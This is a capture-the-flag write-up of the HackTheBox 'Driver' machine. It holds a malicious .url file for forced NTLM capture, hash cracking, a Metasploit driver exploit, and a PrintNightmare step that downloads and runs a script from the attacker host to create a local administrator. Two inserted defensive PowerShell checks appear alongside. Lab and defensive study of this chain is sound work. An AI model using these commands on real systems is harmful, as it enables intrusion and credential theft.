title: HackTheBox-Driver-PrintNightmare
author: Mosaic Theory
layout: true
categories: Vulnerability Labs
tags:
- Target Practice Diary
The man with a new idea is a crank until the idea succeeds.
HackTheBox-Driver
Recon:
masscan has a habit of missing open ports when scanning Windows hosts, which I find unacceptable:
Nmap scan report for 10.10.11.106
Host is up (0.12s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-05-16T14:46:55
|_ start_date: 2022-05-16T14:39:15
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 255.20 seconds
Port 80 requires credentials, which I don't have:
None of the other ports allow anonymous access, so the way in really does look like port 80. Well, admin/admin gets me in. There is actually only one thing that can be clicked; the rest are dummy buttons:
Submitting an arbitrary file lets me capture the HTTP request:
POST /fw_up.php HTTP/1.1
Host: 10.10.11.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------32797649710965608502761959682
Content-Length: 1306
Origin: http://10.10.11.106
DNT: 1
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://10.10.11.106/fw_up.php
Upgrade-Insecure-Requests: 1
-----------------------------32797649710965608502761959682
Content-Disposition: form-data; name="printers"
HTB DesignJet
-----------------------------32797649710965608502761959682
Content-Disposition: form-data; name="firmware"; filename="cacert.der"
Content-Type: application/x-x509-ca-cert
It reports success:
It looks like anything can be uploaded. Since this is an internal network environment, forced authentication can be used:
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\10.10.16.7\%USERNAME%.icon
IconIndex=1
Create a .url file; this file type has the property that the moment a logged-in user sees it on the machine, it is already too late:
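The defender-side counterpart to the shortcut above, as an added example that is not part of the original write-up: a PowerShell scan of a directory that accepts uploads for .url files whose IconFile, URL or WorkingDirectory field points at a UNC path, which is the property that makes Explorer authenticate outbound when the file is rendered. The default path is an assumption.

```powershell
# Added example, not from the original write-up: find Internet Shortcut files
# whose fields point at a UNC path (\\host\share...). Rendering such a file in
# Explorer makes Windows fetch the icon and authenticate to that host.
function Find-UncShortcut {
    param(
        # Assumed location; point it at the directory that receives uploads.
        [string]$Path = 'C:\inetpub\wwwroot\uploads'
    )
    Get-ChildItem -Path $Path -Recurse -File -Filter '*.url' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            Get-Content -LiteralPath $file.FullName -ErrorAction SilentlyContinue |
                ForEach-Object {
                    # Match IconFile=\\host\..., URL=\\host\..., WorkingDirectory=\\host\...
                    if ($_ -match '^\s*(?<key>IconFile|URL|WorkingDirectory)\s*=\s*(?<val>\\\\[^\\\s]+.*)$') {
                        [pscustomobject]@{
                            File   = $file.FullName
                            Key    = $Matches.key
                            Target = $Matches.val
                            # Third element after splitting on backslash is the host name or IP
                            Host   = ($Matches.val -split '\\')[2]
                        }
                    }
                }
        }
}

Find-UncShortcut | Format-Table -AutoSize
```

Any hit whose Host is not an approved file server is worth an alert; the same check applies to .scf and .lnk files, which carry the same icon-fetch behaviour.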
>> sudo responder -I tun0
[sudo] mosaictheory 的密码:
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
>> hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
TONY::DRIVER:913a938f1fb463b5:ffa92e39b6201e8731a288ece8fc0fa4:…:liltony
SMB has nothing more to offer:
>> smbmap -H 10.10.11.106 -u tony -p liltony
[+] IP: 10.10.11.106:445 Name: 10.10.11.106
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
I can connect directly to WinRM on 5985:
>> evil-winrm -i 10.10.11.106 -u tony -p "liltony"
*Evil-WinRM* PS C:\Users\tony> cd Desktop
*Evil-WinRM* PS C:\Users\tony\Desktop> ls
Directory: C:\Users\tony\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/16/2022 7:39 AM 34 user.txt
*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
6..........................................
There is nothing interesting in the privilege information, and systeminfo cannot be run:
*Evil-WinRM* PS C:\Users\tony\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=========== ==============================================
driver\tony S-1-5-21-3114857038-1253923253-2196841645-1003
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
*Evil-WinRM* PS C:\Users\tony\Desktop>
But I can enumerate through Metasploit:
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.11.106 - Collecting local exploits for x64/windows...
[*] 10.10.11.106 - 32 exploit checks are being tried...
[+] 10.10.11.106 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/ricoh_driver_privesc: The target appears to be vulnerable. Ricoh driver directory has full permissions
[+] 10.10.11.106 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Post module execution completed
There is a driver-loading vulnerability, which fits the box's theme.
msf6 exploit(windows/local/ricoh_driver_privesc) > set session 1
session => 1
msf6 exploit(windows/local/ricoh_driver_privesc) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/local/ricoh_driver_privesc) > run
[*] Started reverse TCP handler on 10.10.16.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer gvYCW...
[*] Deleting printer gvYCW
[*] Exploit completed, but no session was created.
But no session came back.
PrintNightmare
In short, when a printer driver is added on Windows, the system checks the APD_INSTALL_WARNED_DRIVER flag. If the client tries to add a printer driver that is on the list and this bit is not set, the server returns the ERROR_PRINTER_DRIVER_WARNED error code; if the client tries to add a listed printer driver and the bit is set, the server goes ahead and adds the driver. The essence of the vulnerability is that a low-privileged user can set the APD_INSTALL_WARNED_DRIVER flag, making Windows load the user's DLL with driver-level (high) privileges. For a code-level explanation, see the following article:
https://bbs.pediy.com/thread-271241.htm
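A mitigation check for the driver-installation path described above, added here as an example and not part of the original write-up: it reads the Point and Print policy values Microsoft documented for the PrintNightmare fixes and reports whether the Spooler is running. The registry path and value names are the documented ones; the wording of the findings is this example's own.

```powershell
# Added example, not from the original write-up: report whether a host still
# exposes the Point and Print driver-installation path abused by PrintNightmare.
function Get-PointAndPrintExposure {
    $pnp     = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue

    # Each value is $null when the policy is not set, i.e. the OS default applies.
    $restrict  = (Get-ItemProperty -Path $pnp -Name RestrictDriverInstallationToAdministrators -ErrorAction SilentlyContinue).RestrictDriverInstallationToAdministrators
    $noWarn    = (Get-ItemProperty -Path $pnp -Name NoWarningNoElevationOnInstall -ErrorAction SilentlyContinue).NoWarningNoElevationOnInstall
    $updPrompt = (Get-ItemProperty -Path $pnp -Name UpdatePromptSettings -ErrorAction SilentlyContinue).UpdatePromptSettings

    $findings = @()
    if ($spooler -and $spooler.Status -eq 'Running') {
        $findings += 'Print Spooler is running; stop and disable it on hosts that do not print.'
    }
    if ($restrict -eq 0) {
        # Explicitly allowing non-admin driver installs re-opens the vulnerable path.
        $findings += 'RestrictDriverInstallationToAdministrators = 0: non-admins may install print drivers.'
    }
    if ($noWarn -eq 1) {
        $findings += 'NoWarningNoElevationOnInstall = 1: install warning and elevation prompt suppressed.'
    }
    if ($updPrompt -eq 1) {
        $findings += 'UpdatePromptSettings = 1: driver update prompt suppressed.'
    }

    [pscustomobject]@{
        ComputerName     = $env:COMPUTERNAME
        SpoolerStatus    = if ($spooler) { [string]$spooler.Status } else { 'NotInstalled' }
        RestrictToAdmins = $restrict
        NoWarningNoElev  = $noWarn
        UpdatePrompt     = $updPrompt
        Findings         = $findings
    }
}

Get-PointAndPrintExposure | Format-List
```

An empty Findings list on a patched host means the policy is at the post-fix defaults (driver installation restricted to administrators); any listed finding is a setting that reintroduces the exposure.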
Importing the exploit script was blocked:
*Evil-WinRM* PS C:\Users\tony\Documents> Import-Module .\CVE-2021-1675.ps1
File C:\Users\tony\Documents\CVE-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module .\CVE-2021-1675.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
*Evil-WinRM* PS C:\Users\tony\Documents> . .\CVE-2021-1675.ps1
File C:\Users\tony\Documents\CVE-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:3
+ . .\CVE-2021-1675.ps1
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess
*Evil-WinRM* PS C:\Users\tony\Documents>
But it can be bypassed by loading the script remotely:
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Expression (New-Object Net.WebClient).DownloadString("ht"+"tp://10.10.16.7/CVE-2021-1675.ps1")
*Evil-WinRM* PS C:\Users\tony\Documents> Get-Command Invoke-Nightmare
CommandType Name Version Source
----------- ---- ------- ------
Function Invoke-Nightmare
I can use the script to add a user, and that user ends up in the local Administrators group:
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare -NewUser "mosaic" -NewPassword "adminadmin"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user mosaic as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
*Evil-WinRM* PS C:\Users\tony\Documents> net user mosaic
User name mosaic
Full Name mosaic
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/16/2022 9:26:38 AM
Password expires Never
Password changeable 5/16/2022 9:26:38 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/16/2022 9:28:03 AM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
*Evil-WinRM* PS C:\Users\tony\Documents>
Open a WinRM session as the new identity:
>> evil-winrm -i 10.10.11.106 -u mosaic -p adminadmin
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mosaic\Documents> whoami
driver\mosaic
*Evil-WinRM* PS C:\Users\mosaic\Documents> cd ../../
*Evil-WinRM* PS C:\Users> cd administrator
*Evil-WinRM* PS C:\Users\administrator> cd desktop
*Evil-WinRM* PS C:\Users\administrator\desktop> type root.txt
f8.........................................
Originally published on the WeChat public account 老鑫安全: HackTheBox-Driver